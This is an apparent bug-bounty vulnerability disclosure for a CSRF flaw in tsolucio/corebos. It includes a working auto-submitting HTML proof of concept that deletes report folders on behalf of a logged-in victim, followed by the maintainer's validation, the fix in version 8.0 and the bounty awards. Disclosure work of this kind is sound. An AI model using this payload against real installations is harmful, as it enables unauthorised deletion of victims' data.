Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Dec 23rd 2021

Description

The lack of a CSRF token and validation of the request method gives the attacker the ability to delete DeleteReportFolder

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.corebos.com/index.php">
      <input type="hidden" name="action" value="ReportsAjax" />
      <input type="hidden" name="mode" value="ajax" />
      <input type="hidden" name="file" value="DeleteReportFolder" />
      <input type="hidden" name="module" value="Reports" />
      <input type="hidden" name="record" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

The attacker has the ability to delete arbitrary report folders on behalf of the victim.

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 2 years ago

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago

Joe Bordes validated this vulnerability 2 years ago

Muhammad Adel has been awarded the disclosure bounty

The fix bounty is now up for grabs

Joe Bordes marked this as fixed in 8.0 with commit 6da824 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation